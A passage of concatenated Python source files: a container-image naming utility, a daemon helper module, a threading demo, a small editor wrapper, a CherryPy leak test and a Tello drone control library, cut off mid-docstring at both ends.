as the tag.
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1'
>>> single_targets = [build_target("samtools", version="1.3.1", build="py_1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1--py_1'
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets, image_build="0")
'samtools:1.3.1'
>>> single_targets = [build_target("samtools", version="1.3.1", build="py_1")]
>>> v2_image_name(single_targets, image_build="0")
'samtools:1.3.1--py_1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v2_image_name(multi_targets)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:4d0535c94ef45be8459f429561f0894c3fe0ebcf'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v2_image_name(multi_targets_on_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:b0c847e4fb89c343b04036e33b2daa19c4152cf5'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v2_image_name(multi_targets_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
package_name_buffer = "\n".join(map(lambda t: t.package_name, targets_order))
package_hash = hashlib.sha1()
package_hash.update(package_name_buffer.encode())
versions = map(lambda t: t.version, targets_order)
if any(versions):
# Only hash versions if at least one package has versions...
version_name_buffer = "\n".join(map(lambda t: t.version or "null", targets_order))
version_hash = hashlib.sha1()
version_hash.update(version_name_buffer.encode())
version_hash_str = version_hash.hexdigest()
else:
version_hash_str = ""
if not image_build:
build_suffix = ""
elif version_hash_str:
# tagged verson is <version_hash>-<build>
build_suffix = "-%s" % image_build
else:
# tagged version is simply the build
build_suffix = image_build
suffix = ""
if version_hash_str or build_suffix:
suffix = ":%s%s" % (version_hash_str, build_suffix)
return "mulled-v2-%s%s" % (package_hash.hexdigest(), suffix)
def get_file_from_recipe_url(url):
"""Downloads file at url and returns tarball"""
r = requests.get(url)
return tarfile.open(mode="r:bz2", fileobj=BytesIO(r.content))
def split_container_name(name):
"""
Takes a container name (e.g. samtools:1.7--1) and returns a list (e.g. ['samtools', '1.7', '1'])
>>> split_container_name('samtools:1.7--1')
['samtools', '1.7', '1']
"""
return name.replace('--', ':').split(':')
class PrintProgress(object):
def __init__(self):
self.thread = threading.Thread(target=self.progress)
self.stop = threading.Event()
def progress(self):
while not self.stop.is_set():
print(".", end="")
sys.stdout.flush()
self.stop.wait(60)
print("")
def __enter__(self):
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop.set()
self.thread.join()
image_name = v1_image_name # deprecated
__all__ = (
"build_target",
"conda_build_target_str",
"image_name",
"mulled_tags_for",
"quay_versions",
"split_container_name",
"split_tag",
"Target",
"v1_image_name",
"v2_image_name",
"version_sorted",
)
|
helper.py
|
import os
import sys
import time
import psutil
import logging
import threading
import logging.handlers
import subprocess as subps
from scalrpy import __version__
def configure_log(log_level=1, log_file=None, log_size=1024*10):
level = {
0:logging.CRITICAL,
1:logging.ERROR,
2:logging.WARNING,
3:logging.INFO,
4:logging.DEBUG,
}
if log_level not in level.keys():
sys.stderr.write('Wrong logging level. Set DEBUG\n')
log_level = 4
log = logging.getLogger('ScalrPy')
log.setLevel(level[log_level])
frmtr = logging.Formatter(
'[%(asctime)s]' + \
'[%s]' % __version__ + \
'[%(module)s]' + \
'[%(process)d]' + \
'[%(thread)d] ' + \
'%(levelname)s %(message)s', datefmt='%d/%b/%Y %H:%M:%S'
)
hndlr = logging.StreamHandler(sys.stderr)
hndlr.setLevel(level[log_level])
hndlr.setFormatter(frmtr)
log.addHandler(hndlr)
if log_file:
hndlr = logging.handlers.RotatingFileHandler(
log_file,
mode='a',
maxBytes=log_size
)
hndlr.setLevel(level[log_level])
hndlr.setFormatter(frmtr)
log.addHandler(hndlr)
def check_pid(pid_file):
if os.path.exists(pid_file):
pid = open(pid_file).read().strip()
if pid and os.path.exists('/proc/' + pid):
return True
return False
def kill_ps(pid, child=False):
parent = psutil.Process(pid)
if child:
for child in parent.get_children(recursive=True):
child.kill()
parent.kill()
def exc_info(line_no=True):
exc_type, exc_obj, exc_tb = sys.exc_info()
if line_no:
return '%s %s line: %s' % (str(exc_type), str(exc_obj), str(exc_tb.tb_lineno))
else:
return '%s %s' % (str(exc_type), str(exc_obj))
def validate_config(config, key=None):
if type(config) == dict:
for k in config:
validate_config(config[k], key='%s:%s' % (key, k) if key else k)
else:
value = config
assert config != None , "Wrong config value '%s:%s'" % (key, value)
def update_config(config_from=None, config_to=None, args=None):
if not config_from:
config_from = dict()
if config_to == None:
config_to = dict()
for k, v in config_from.iteritems():
if k not in config_to:
config_to[k] = v
if type(v) == dict:
update_config(config_from[k], config_to[k])
elif v != None:
config_to[k] = v
if not hasattr(args, '__dict__'):
return
for k, v in vars(args).iteritems():
if v is not None:
config_to.update({k:v})
class Pool(object):
def __init__(self, factory, validator, size):
self._used = list()
self._free = list()
self._size = size
self._factory = factory
self._validator = validator
self._get_lock = threading.Lock()
self._put_lock = threading.Lock()
def get(self, timeout=None):
self._get_lock.acquire()
try:
if timeout:
time_until = time.time() + timeout
while True:
if self._free:
o = self._free.pop()
o = o if self._validator(o) else self._factory()
self._used.append(o)
return o
elif len(self._used) < self._size:
o = self._factory()
self._used.append(o)
return o
else:
if timeout and time.time() >= time_until:
raise Exception('Pool.get timeout')
time.sleep(0.33)
continue
finally:
self._get_lock.release()
def put(self, o):
self._put_lock.acquire()
try:
if o not in self._used:
return
self._used.remove(o)
if self._validator(o):
self._free.append(o)
finally:
self._put_lock.release()
def remove(self, o):
if o in self._used:
self._used.remove(o)
if o in self._free:
self._free.remove(o)
def x1x2(farm_id):
i = int(str(farm_id)[-1]) - 1
x1 = str(i - 5 * (i / 5) + 1)[-1]
x2 = str(i - 5 * (i / 5) + 6)[-1]
return 'x%sx%s' % (x1, x2)
def call(cmd, **kwds):
if 'stdout' not in kwds:
kwds.update({'stdout':subps.PIPE})
if 'stderr' not in kwds:
kwds.update({'stderr':subps.PIPE})
p = subps.Popen(cmd.split(), **kwds)
stdout, stderr = p.communicate()
return stdout, stderr
def apply_async(f):
def new_f(*args, **kwds):
pool = kwds.pop('pool')
return pool.apply_async(f, args=args, kwds=kwds)
return new_f
def thread(f):
def new_f(*args, **kwds):
t = threading.Thread(target=f, args=args, kwargs=kwds)
t.start()
return t
return new_f
def create_pid_file(pid_file):
pid = str(os.getpid())
file(pid_file,'w+').write('%s\n' % pid)
def delete_file(file_path):
if os.path.exists(file_path):
os.remove(file_path)
def daemonize(stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
# first fork
pid = os.fork()
if pid > 0:
sys.exit(0)
os.chdir('/')
os.setsid()
os.umask(0)
# second fork
pid = os.fork()
if pid > 0:
sys.exit(0)
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = file(stdin, 'r')
so = file(stdout, "a+")
se = file(stderr, "a+", 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
|
017-thread.py
|
import os,time
from threading import Thread,Lock
database_value = 0
def increase(lock):
global database_value
# lock.acquire()
# local_copy = database_value
# # processing
# local_copy += 1
# time.sleep(0.1)
# database_value = local_copy
# lock.release()
with lock:
local_copy = database_value
# processing
local_copy += 1
time.sleep(0.1)
database_value = local_copy
if __name__ == "__main__":
lock = Lock()
print('Start value', database_value)
thread1 = Thread(target=increase,args=(lock,))
thread2 = Thread(target=increase,args=(lock,))
thread1.start()
thread2.start()
thread1.join()
thread2.join()
print('end value', database_value)
print('end main')
|
vim.py
|
import os,sys, tempfile
from io import StringIO
#from thebe.core.output import outputController
from multiprocessing import Process
from subprocess import call, check_output
class FileManager:
def __init__(self, target_name):
self.temp_name = ''
self.target_name = target_name
target_ext = self.test_file(self.target_name)
if target_ext == 'ipynb':
self.ipynb_name = ipynb_name
ipynb_content = self.load_ipynb(target_name)
self.target_name = self.write_temp(ipynb_content)
def test_file(targetLocation):
'''
Return the relevant extension.
If input is incorrect, explain, and quit the application.
'''
if os.path.isfile(targetLocation):
try:
return test_extension(targetLocation)
except ValueError:
logging.info('Please use a valid file extension. (.ipynb or .py)')
sys.exit()
else:
logging.info('Thebe only works with files, not directories. Please try again with a file. (.ipynb or .py)')
sys.exit()
def test_extension(targetLocation):
'''
'''
targetExtension=targetLocation.split('.')[1]
if targetExtension=='ipynb':
return 'ipynb'
elif targetExtension=='py':
return 'py'
else:
logging.info('Please use a valid file extension. (.ipynb or .py)')
sys.exit()
def load_ipynb(targetLocation):
'''
Return the ipynb file as a dictionary.
'''
data = {}
with open(targetLocation) as ipynb_data:
data = json.load(ipynb_data)
return data
def open(self):
'''
'''
print('This is the location of the temporary file:\t%s'%(self.temp_loc))
def callVim():
# Open the file with the text editor
# outputController.open()
so = sys.stdout = StringIO()
EDITOR = os.environ.get('EDITOR','vim')
call([EDITOR, self.temp_loc])
# outputController.close()
try:
print('Starting vim process...')
vim = Process(target = callVim)
vim.start()
except KeyboardInterrupt:
print("Terminating vim server.")
vim.terminate()
vim.join()
print("Terminated flask server.")
|
test_refleaks.py
|
"""Tests for refleaks."""
from cherrypy._cpcompat import HTTPConnection, HTTPSConnection, ntob
import threading
import cherrypy
data = object()
from cherrypy.test import helper
class ReferenceTests(helper.CPWebCase):
def setup_server():
class Root:
def index(self, *args, **kwargs):
cherrypy.request.thing = data
return "Hello world!"
index.exposed = True
cherrypy.tree.mount(Root())
setup_server = staticmethod(setup_server)
def test_threadlocal_garbage(self):
success = []
def getpage():
host = '%s:%s' % (self.interface(), self.PORT)
if self.scheme == 'https':
c = HTTPSConnection(host)
else:
c = HTTPConnection(host)
try:
c.putrequest('GET', '/')
c.endheaders()
response = c.getresponse()
body = response.read()
self.assertEqual(response.status, 200)
self.assertEqual(body, ntob("Hello world!"))
finally:
c.close()
success.append(True)
ITERATIONS = 25
ts = []
for _ in range(ITERATIONS):
t = threading.Thread(target=getpage)
ts.append(t)
t.start()
for t in ts:
t.join()
self.assertEqual(len(success), ITERATIONS)
|
tello.py
|
# coding=utf-8
import logging
import socket
import time
import threading
import cv2 # type: ignore
from threading import Thread
from typing import Optional, Union, Type, Dict
from .enforce_types import enforce_types
threads_initialized = False
drones: Optional[dict] = {}
client_socket: socket.socket
@enforce_types
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
[1.3](https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf),
[2.0 with EDU-only commands](https://dl-cdn.ryzerobotics.com/downloads/Tello/Tello%20SDK%202.0%20User%20Guide.pdf)
"""
# Send and receive commands, client socket
RESPONSE_TIMEOUT = 7 # in seconds
TAKEOFF_TIMEOUT = 20 # in seconds
TIME_BTW_COMMANDS = 0.1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.001 # in seconds
RETRY_COUNT = 3 # number of retries after a failed command
TELLO_IP = '192.168.10.1' # Tello IP address
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
CONTROL_UDP_PORT = 8889
STATE_UDP_PORT = 8890
# Set up logger
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('[%(levelname)s] %(filename)s - %(lineno)d - %(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# Use Tello.LOGGER.setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Conversion functions for state protocol fields
INT_STATE_FIELDS = (
# Tello EDU with mission pads enabled only
'mid', 'x', 'y', 'z',
# 'mpry': (custom format 'x,y,z')
# Common entries
'pitch', 'roll', 'yaw',
'vgx', 'vgy', 'vgz',
'templ', 'temph',
'tof', 'h', 'bat', 'time'
)
FLOAT_STATE_FIELDS = ('baro', 'agx', 'agy', 'agz')
state_field_converters: Dict[str, Union[Type[int], Type[float]]]
state_field_converters = {key : int for key in INT_STATE_FIELDS}
state_field_converters.update({key : float for key in FLOAT_STATE_FIELDS})
# VideoCapture object
cap: Optional[cv2.VideoCapture] = None
background_frame_read: Optional['BackgroundFrameRead'] = None
stream_on = False
is_flying = False
def __init__(self,
host=TELLO_IP,
retry_count=RETRY_COUNT):
global threads_initialized, client_socket, drones
self.address = (host, Tello.CONTROL_UDP_PORT)
self.stream_on = False
self.retry_count = retry_count
self.last_received_command_timestamp = time.time()
self.last_rc_control_timestamp = time.time()
if not threads_initialized:
# Run Tello command responses UDP receiver on background
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_socket.bind(('', Tello.CONTROL_UDP_PORT))
response_receiver_thread = threading.Thread(target=Tello.udp_response_receiver)
response_receiver_thread.daemon = True
response_receiver_thread.start()
# Run state UDP receiver on background
state_receiver_thread = threading.Thread(target=Tello.udp_state_receiver)
state_receiver_thread.daemon = True
state_receiver_thread.start()
threads_initialized = True
drones[host] = {'responses': [], 'state': {}}
self.LOGGER.info("Tello instance was initialized. Host: '{}'. Port: '{}'.".format(host, Tello.CONTROL_UDP_PORT))
def get_own_udp_object(self):
global drones
host = self.address[0]
return drones[host]
@staticmethod
def udp_response_receiver():
"""Setup drone UDP receiver. This method listens for responses of Tello.
Must be run from a background thread in order to not block the main thread.
Internal method, you normally wouldn't call this yourself.
"""
while True:
try:
data, address = client_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at client_socket'.format(address))
if address not in drones:
continue
drones[address]['responses'].append(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def udp_state_receiver():
"""Setup state UDP receiver. This method listens for state information from
Tello. Must be run from a background thread in order to not block
the main thread.
Internal method, you normally wouldn't call this yourself.
"""
state_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
state_socket.bind(("", Tello.STATE_UDP_PORT))
while True:
try:
data, address = state_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at state_socket'.format(address))
if address not in drones:
continue
data = data.decode('ASCII')
drones[address]['state'] = Tello.parse_state(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def parse_state(state: str) -> Dict[str, Union[int, float, str]]:
"""Parse a state line to a dictionary
Internal method, you normally wouldn't call this yourself.
"""
state = state.strip()
Tello.LOGGER.debug('Raw state data: {}'.format(state))
if state == 'ok':
return {}
state_dict = {}
for field in state.split(';'):
split = field.split(':')
if len(split) < 2:
continue
key = split[0]
value: Union[int, float, str] = split[1]
if key in Tello.state_field_converters:
num_type = Tello.state_field_converters[key]
try:
value = num_type(value)
except ValueError as e:
Tello.LOGGER.debug('Error parsing state value for {}: {} to {}'
.format(key, value, num_type))
Tello.LOGGER.error(e)
continue
state_dict[key] = value
return state_dict
def get_current_state(self) -> dict:
"""Call this function to attain the state of the Tello. Returns a dict
with all fields.
Internal method, you normally wouldn't call this yourself.
"""
return self.get_own_udp_object()['state']
def get_state_field(self, key: str):
"""Get a specific sate field by name.
Internal method, you normally wouldn't call this yourself.
"""
state = self.get_current_state()
if key in state:
return state[key]
else:
raise Exception('Could not get state property: {}'.format(key))
def get_mission_pad_id(self) -> int:
"""Mission pad ID of the currently detected mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: -1 if none is detected, else 1-8
"""
return self.get_state_field('mid')
def get_mission_pad_distance_x(self) -> int:
"""X distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('x')
def get_mission_pad_distance_y(self) -> int:
"""Y distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('y')
def get_mission_pad_distance_z(self) -> int:
"""Z distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('z')
def get_pitch(self) -> int:
"""Get pitch in degree
Returns:
int: pitch in degree
"""
return self.get_state_field('pitch')
def get_roll(self) -> int:
"""Get roll in degree
Returns:
int: roll in degree
"""
return self.get_state_field('roll')
def get_yaw(self) -> int:
"""Get yaw in degree
Returns:
int: yaw in degree
"""
return self.get_state_field('yaw')
def get_speed_x(self) -> int:
"""X-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgx')
def get_speed_y(self) -> int:
"""Y-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgy')
def get_speed_z(self) -> int:
"""Z-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgz')
def get_acceleration_x(self) -> float:
"""X-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agx')
def get_acceleration_y(self) -> float:
"""Y-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agy')
def get_acceleration_z(self) -> float:
"""Z-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agz')
def get_lowest_temperature(self) -> int:
"""Get lowest temperature
Returns:
int: lowest temperature (°C)
"""
return self.get_state_field('templ')
def get_highest_temperature(self) -> int:
"""Get highest temperature
Returns:
float: highest temperature (°C)
"""
return self.get_state_field('temph')
def get_temperature(self) -> float:
"""Get average temperature
Returns:
float: average temperature (°C)
"""
templ = self.get_lowest_temperature()
temph = self.get_highest_temperature()
return (templ + temph) / 2
def get_height(self) -> int:
"""Get current height in cm
Returns:
int: height in cm
"""
return self.get_state_field('h')
def get_distance_tof(self) -> int:
"""Get current distance value from TOF in cm
Returns:
int: TOF distance in cm
"""
return self.get_state_field('tof')
def get_barometer(self) -> int:
"""Get current barometer measurement in cm
This resembles the absolute height.
See https://en.wikipedia.org/wiki/Altimeter
Returns:
int: barometer measurement in cm
"""
return self.get_state_field('baro') * 100
def get_flight_time(self) -> int:
"""Get the time the motors have been active in seconds
Returns:
int: flight time in s
"""
return self.get_state_field('time')
def get_battery(self) -> int:
"""Get current battery percentage
Returns:
int: 0-100
"""
return self.get_state_field('bat')
def get_udp_video_address(self) -> str:
"""Internal method, you normally wouldn't call this youself.
"""
address_schema = 'udp://@{ip}:{port}' # + '?overrun_nonfatal=1&fifo_size=5000'
address = address_schema.format(ip=self.VS_UDP_IP, port=self.VS_UDP_PORT)
return address
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone.
Users usually want to use get_frame_read instead.
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self) -> 'BackgroundFrameRead':
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
address = self.get_udp_video_address()
self.background_frame_read = BackgroundFrameRead(self, address) # also sets self.cap
self.background_frame_read.start()
return self.background_frame_read
def stop_video_capture(self):
return self.streamoff()
def send_command_with_return(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> str:
"""Send command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
Return:
bool/str: str with response text on success, False when unsuccessfull.
"""
# Commands very consecutive makes the drone not respond to them.
# So wait at least self.TIME_BTW_COMMANDS seconds
diff = time.time() - self.last_received_command_timestamp
if diff < self.TIME_BTW_COMMANDS:
self.LOGGER.debug('Waiting {} seconds to execute command: {}...'.format(diff, command))
time.sleep(diff)
self.LOGGER.info("Send command: '{}'".format(command))
timestamp = time.time()
client_socket.sendto(command.encode('utf-8'), self.address)
responses = self.get_own_udp_object()['responses']
while not responses:
if time.time() - timestamp > timeout:
message = "Aborting command '{}'. Did not receive a response after {} seconds".format(command, timeout)
self.LOGGER.warning(message)
return message
time.sleep(0.1) # Sleep during send command
self.last_received_command_timestamp = time.time()
first_response = responses.pop(0) # first datum from socket
try:
response_decoded = first_response.decode('utf-8')
except UnicodeDecodeError as e:
pass
#print(e)
#print(response_0)
response = response_decoded.rstrip("\r\n")
self.LOGGER.info("Response {}: '{}'".format(command, response))
return response
def send_command_without_return(self, command: str):
"""Send command to Tello without expecting a response.
Internal method, you normally wouldn't call this yourself.
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
self.LOGGER.info("Send command (no response expected): '{}'".format(command))
client_socket.sendto(command.encode('utf-8'), self.address)
def send_control_command(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> bool:
"""Send control command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = "max retries exceeded"
for i in range(0, self.retry_count):
response = self.send_command_with_return(command, timeout=timeout)
if response.lower() == 'ok':
return True
self.LOGGER.debug("Command attempt #{} failed for command: '{}'".format(i, command))
self.raise_result_error(command, response)
return False # never reached
def send_read_command(self, command: str) -> str:
"""Send given command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
pass
if any(word in response for word in ('error', 'ERROR', 'False')):
self.raise_result_error(command, response)
return "Error: this code should never be reached"
return response
def send_read_command_int(self, command: str) -> int:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return int(response)
def send_read_command_float(self, command: str) -> float:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return float(response)
def raise_result_error(self, command: str, response: str) -> bool:
tries = 1 + self.retry_count
raise Exception("Command '{}' was unsuccessful for {} tries. Latest response:\t'{}'".format(command, tries, response))
def connect(self, wait_for_state=True):
"""Enter SDK mode. Call this before any of the control functions.
"""
self.send_control_command("command")
if wait_for_state:
REPS = 20
for i in range(REPS):
if self.get_current_state():
t = i / REPS # in seconds
Tello.LOGGER.debug("'.connect()' received first state packet after {} seconds".format(t))
break
time.sleep(1 / REPS)
if not self.get_current_state():
raise Exception('Did not receive a state packet from the Tello')
def takeoff(self):
"""Automatic takeoff.
"""
# Something it takes a looooot of time to take off and return a succesful takeoff.
# So we better wait. Otherwise, it would give us an error on the following calls.
self.send_control_command("takeoff", timeout=Tello.TAKEOFF_TIMEOUT)
self.is_flying = True
def land(self):
"""Automatic landing.
"""
self.send_control_command("land")
self.is_flying = False
def streamon(self):
"""Turn on video streaming. Use `tello.get_frame_read` afterwards.
Video Streaming is supported on all tellos when in AP mode (i.e.
when your computer is connected to Tello-XXXXXX WiFi ntwork).
Currently Tello EDUs do not support video streaming while connected
to a WiFi-network.
!!! Note:
If the response is 'Unknown command' you have to update the Tello
firmware. This can be done using the official Tello app.
"""
self.send_control_command("streamon")
self.stream_on = True
def streamoff(self):
"""Turn off video streaming.
"""
self.send_control_command("streamoff")
self.stream_on = False
def emergency(self):
"""Stop all motors immediately.
"""
self.send_control_command("emergency")
def move(self, direction: str, x: int):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Users would normally call one of the move_x functions instead.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
"""
self.send_control_command("{} {}".format(direction, x))
def move_up(self, x: int):
"""Fly x cm up.
Arguments:
x: 20-500
"""
self.move("up", x)
def move_down(self, x: int):
"""Fly x cm down.
Arguments:
x: 20-500
"""
self.move("down", x)
def move_left(self, x: int):
"""Fly x cm left.
Arguments:
x: 20-500
"""
self.move("left", x)
def move_right(self, x: int):
"""Fly x cm right.
Arguments:
x: 20-500
"""
self.move("right", x)
def move_forward(self, x: int):
"""Fly x cm forward.
Arguments:
x: 20-500
"""
self.move("forward", x)
def move_back(self, x: int):
"""Fly x cm backwards.
Arguments:
x: 20-500
"""
self.move("back", x)
def rotate_clockwise(self, x: int):
"""Rotate x degree clockwise.
Arguments:
x: 1-360
"""
self.send_control_command("cw {}".format(x))
def rotate_counter_clockwise(self, x: int):
"""Rotate x degree counter-clockwise.
Arguments:
x: 1-3600
"""
self.send_control_command("ccw {}".format(x))
def flip(self, direction: str):
"""Do a flip maneuver.
Users would normally call one of the flip_x functions instead.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
"""
self.send_control_command("flip {}".format(direction))
def flip_left(self):
"""Flip to the left.
"""
self.flip("l")
def flip_right(self):
"""Flip to the right.
"""
self.flip("r")
def flip_forward(self):
"""Flip forward.
"""
self.flip("f")
def flip_back(self):
"""Flip backwards.
"""
self.flip("b")
def go_xyz_speed(self, x: int, y: int, z: int, speed: int):
"""Fly to x y z relative to the current position.
Speed defines the traveling speed in cm/s.
Arguments:
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
"""
cmd = 'go {} {} {} {}'.format(x, y, z, speed)
self.send_control_command(cmd)
def curve_xyz_speed(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the current position
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
x2: -500-500
y1: -500-500
y2: -500-500
z1: -500-500
z2: -500-500
speed: 10-60
"""
cmd = 'curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed)
self.send_control_command(cmd)
def go_xyz_speed_mid(self, x: int, y: int, z: int, speed: int, mid: int):
"""Fly to x y z relative to the mission pad with id mid.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
"""
cmd = 'go {} {} {} {} m{}'.format(x, y, z, speed, mid)
self.send_control_command(cmd)
def curve_xyz_speed_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the mission pad with id mid.
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
"""
cmd = 'curve {} {} {} {} {} {} {} m{}'.format(x1, y1, z1, x2, y2, z2, speed, mid)
self.send_control_command(cmd)
def go_xyz_speed_yaw_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: int, mid2: int):
"""Fly to x y z relative to mid1.
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
"""
cmd = 'jump {} {} {} {} {} m{} m{}'.format(x, y, z, speed, yaw, mid1, mid2)
self.send_control_command(cmd)
def enable_mission_pads(self):
"""Enable mission pad detection
"""
self.send_control_command("mon")
def disable_mission_pads(self):
"""Disable mission pad detection
"""
self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
"""Set mission pad detection direction. enable_mission_pads needs to be
called first. When detecting both directions detecting frequency is 10Hz,
otherwise the detection frequency is 20Hz.
Arguments:
x: 0 downwards only, 1 forwards only, 2 both directions
"""
self.send_control_command("mdirection {}".format(x))
def set_speed(self, x: int):
"""Set speed to x cm/s.
Arguments:
x: 10-100
"""
self.send_control_command("speed {}".format(x))
def send_rc_control(self, left_right_velocity: int, forward_backward_velocity: int, up_down_velocity: int,
yaw_velocity: int):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
"""
def clamp100(x: int) -> int:
return max(-100, min(100, x))
if time.time() - self.last_rc_control_timestamp > self.TIME_BTW_RC_CONTROL_COMMANDS:
self.last_rc_control_timestamp = time.time()
cmd = 'rc {} {} {} {}'.format(
clamp100(left_right_velocity),
clamp100(forward_backward_velocity),
clamp100(up_down_velocity),
clamp100(yaw_velocity)
)
self.send_command_without_return(cmd)
def set_wifi_credentials(self, ssid, password):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
"""
cmd = 'wifi {} {}'.format(ssid, password)
self.send_command_without_return(cmd)
def connect_to_wifi(self, ssid, password):
"""Connects to the Wi-Fi with SSID and password.
After this command the tello will reboot.
Only works with Tello EDUs.
"""
cmd = 'ap {} {}'.format(ssid, password)
self.send_command_without_return(cmd)
def query_speed(self) -> int:
"""Query speed setting (cm/s)
Returns:
int: 1-100
"""
return self.send_read_command_int('speed?')
def query_battery(self) -> int:
"""Get current battery percentage via a query command
Using get_battery is usually faster
Returns:
int: 0-100 in %
"""
return self.send_read_command_int('battery?')
def query_flight_time(self) -> int:
"""Query current fly time (s).
Using get_flight_time is usually faster.
Returns:
int: Seconds elapsed during flight.
"""
return self.send_read_command_int('time?')
def query_height(self) -> int:
"""Get height in cm via a query command.
Using get_height is usually faster
Returns:
int: 0-3000
"""
return self.send_read_command_int('height?')
def query_temperature(self) -> int:
"""Query temperature (°C).
Using get_temperature is usually faster.
Returns:
int: 0-90
"""
return self.send_read_command_int('temp?')
def query_attitude(self) -> dict:
"""Query IMU attitude data.
Using get_pitch, get_roll and get_yaw is usually faster.
Returns:
